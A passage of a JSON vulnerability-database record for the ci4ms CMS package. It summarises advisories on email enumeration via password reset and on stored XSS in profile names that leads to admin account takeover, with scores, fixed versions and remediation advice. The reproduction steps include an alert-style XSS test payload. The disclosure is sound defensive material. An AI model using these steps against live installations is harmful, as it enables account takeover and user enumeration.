a priority.\n\n- **Enforce security headers and cookie attributes:**\n - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n# Ready Video POC:\nhttps://mega.nz/file/2c8lHSBQ#vwFDj0vhq7vLwMJjBjnAgbHWiIdFqUxAA913H_yQExQ", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34564", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05058", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05035", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05043", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.06082", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34564" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:53:15Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-g4pp-fhgf-8653", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-02T13:53:15Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-g4pp-fhgf-8653" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34564", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34564" }, { "reference_url": "https://github.com/advisories/GHSA-g4pp-fhgf-8653", "reference_id": "GHSA-g4pp-fhgf-8653", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g4pp-fhgf-8653" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2v9s-x9dt-8ugb" }, { "vulnerability": "VCID-6nzs-j8gz-9ucu" }, { "vulnerability": "VCID-8x3z-1p5j-6qfa" }, { "vulnerability": "VCID-c1ux-y4qk-xfch" }, { "vulnerability": "VCID-e9xp-rar3-c7bp" }, { "vulnerability": "VCID-fjcm-syrk-87fg" }, { "vulnerability": "VCID-j32w-tcpz-1fak" }, { "vulnerability": "VCID-mds3-7xh3-mkgv" }, { "vulnerability": "VCID-p1q2-w18a-3kae" }, { "vulnerability": "VCID-qrag-mndk-xbb7" }, { "vulnerability": "VCID-ux28-acyz-kqd1" }, { "vulnerability": "VCID-w12h-33nr-bufh" }, { "vulnerability": "VCID-ye3h-3tu7-p3e7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0" } ], "aliases": [ "CVE-2026-34564", "GHSA-g4pp-fhgf-8653" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x3ze-8mnc-p7ak" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49927?format=api", "vulnerability_id": "VCID-y5t2-vxku-muhj", "summary": "CI4MS Vulnerable to User Email Enumeration via Password Reset Flow\n**Summary**\n\nThe authentication implementation in CI4MS is vulnerable to email enumeration. An unauthenticated attacker can determine whether an email address is registered in the system by analyzing the application's response during the password reset process.\n\n**Vulnerability Details**\n\n- The password reset flow returns different responses based on whether the provided email address exists in the database or not.\n- If the email is registered, the system typically returns a success message (e.g., \"Password reset link has been sent\").\n\nIf the email is not registered, the system returns an error message (e.g., \"User not found\" or a different HTTP status code).\n\nThis discrepancy allows attackers to programmatically \"enumerate\" or confirm valid user emails, which can then be used for targeted phishing attacks or brute-force attempts.\n\n**Steps to Reproduce**\n\n1. Navigate to the password reset page of the CI4MS installation.\n2. Enter an email address that you know is not registered (e.g., nonexistent@example.com) and submit. Note the response message/code.\n3. Enter an email address that is registered (e.g., an admin or test account) and submit. Note the different response.\n4. The difference between these two responses confirms the enumeration vulnerability.\n\n**Suggested Mitigation**\n\nImplement a uniform, generic response for all password reset requests, regardless of whether the email exists. Recommended message: \"If an account is associated with this email address, a password reset link has been sent.\"", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25509", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07998", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08048", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08065", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08052", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25509" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-04T16:30:42Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/commit/86be2930d1c54eb7575102563302b2f3bafcb653" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25509", "reference_id": "CVE-2026-25509", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25509" }, { "reference_url": "https://github.com/advisories/GHSA-654x-9q7r-g966", "reference_id": "GHSA-654x-9q7r-g966", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-654x-9q7r-g966" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-654x-9q7r-g966", "reference_id": "GHSA-654x-9q7r-g966", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-04T16:30:42Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-654x-9q7r-g966" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73772?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.28.5%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.28.5%252B0" } ], "aliases": [ "CVE-2026-25509", "GHSA-654x-9q7r-g966" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y5t2-vxku-muhj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89264?format=api", "vulnerability_id": "VCID-ye3h-3tu7-p3e7", "summary": "CI4MS: Profile & User Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability 1: Stored DOM XSS via Profile Name Update (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized User Name in Profile Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when users update their profile name (e.g., full name / username). An attacker can inject a malicious JavaScript payload into their profile name, which is then stored server-side.\n\nThis stored payload is later rendered unsafely in multiple application views without proper output encoding, leading to stored cross-site scripting (XSS).\n\n### Affected Functionality\n- Profile name / full name update functionality (both the 2 user inputs)\n- User profile storage and retrieval logic\n\n### Attack Scenario\n- An attacker updates their profile name to include a malicious XSS payload.\n- The application stores this value without sanitization or encoding.\n- The payload persists and executes whenever the name is rendered in affected views.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Foundation for privilege escalation and account takeover when viewed by privileged users & normal ones across blogs and public facing pages that show user profiles full names\n\nEndpoint: `/backend/users/profile/`\n\n### **Vulnerability 2: Stored XSS via User Name Rendering Across Multiple Endpoints (Privilege Escalation)**\n(Required for the chain)\n- Stored XSS via Unsafe Rendering of User Names Across Administrative and Public Interfaces\n\n### Description\nUser-controlled profile fields (specifically the username / full name) are rendered unsafely across multiple application endpoints, including administrative and content-related interfaces. The application fails to apply proper output encoding when displaying these values.\n\nWhen an administrator accesses affected pages, the stored XSS payload executes in the administrator’s browser context, resulting in administrative privilege escalation and potential full admin account takeover.\n\nThis issue is not limited to a single endpoint and affects all areas where the username is rendered, including but not limited to:\n- User management interfaces\n- Blog pages\n- Other content or UI components displaying usernames\n\n### Attack Scenario\n- Attacker injects a malicious payload via the profile name update functionality.\n- The payload is stored persistently.\n- An administrator views the user management page or any affected interface.\n- The payload executes automatically in the admin’s browser.\n- Attacker hijacks the admin session, performs privileged actions, or fully compromises the admin account.\n\n### Impact\n- Stored XSS\n- Administrative privilege escalation\n- Full admin account takeover (including other roles)\n- Full compromise of the entire application\n\nEndpoint Example: `/backend/users/` of User Management Page\n\n## Steps To Reproduce (POC)\n1. Go to Profile Management page of the User\n2. In the 2 user inputs of the Full Name, put in any field of them a XSS Payload such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the edit\n4. Go to User Management page as an Admin or any other role\n5. Notice the XSS alert popping up that confirms it\n6. Other endpoints aswell can execute such as blogs in the public facing one \n\n### Recommended Remediation\n\n1. **Eliminate Unsafe DOM Sinks:** Remove all usage of `.html()`, `innerHTML`, and similar unsafe DOM manipulation methods throughout the application. These sinks should be replaced with safe alternatives such as `.text()` or `textContent`, which do not interpret HTML markup.\n\n2. **Implement Output Encoding:** Apply context-appropriate HTML entity encoding to all user-controlled data before rendering it in the DOM. This ensures that any special characters (e.g., `<`, `>`, `\"`, `'`) are rendered as literal text rather than interpreted as executable markup.\n\n3. **Implement Server-Side Input Sanitization:** Enforce strict input validation and sanitization on all user-controlled fields — particularly the profile name fields — at the server level before storing values in the database. Currently, no sanitization is applied to these inputs.\n\n4. **Apply Defense in Depth:** Even in cases where user input does not appear to flow directly into a dangerous sink, it should still be treated as untrusted. Attackers can and will leverage indirect data flows to exploit the application. A layered approach combining input validation, output encoding, and Content Security Policy (CSP) headers is strongly recommended.\n# Ready Video POC:\nhttps://mega.nz/file/iEVEyT4Y#f046o6ZwYBfS1kK0HNKOCFm6tL_8_SbLtWWKC1hYC4M", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34989", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15923", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15785", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15872", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15912", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34989" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ci4-cms-erp/ci4ms" }, { "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-vr2g-rhm5-q4jr", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:57:55Z/" } ], "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-vr2g-rhm5-q4jr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34989", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34989" }, { "reference_url": "https://github.com/advisories/GHSA-vr2g-rhm5-q4jr", "reference_id": "GHSA-vr2g-rhm5-q4jr", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vr2g-rhm5-q4jr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1126162?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@31.0.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@31.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/110305?format=api", "purl": "pkg:composer/ci4-cms-erp/ci4ms@31.0.0%2B0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@31.0.0%252B0" } ], "aliases": [ "CVE-2026-34989", "GHSA-vr2g-rhm5-q4jr" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ye3h-3tu7-p3e7" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.25.1.0" }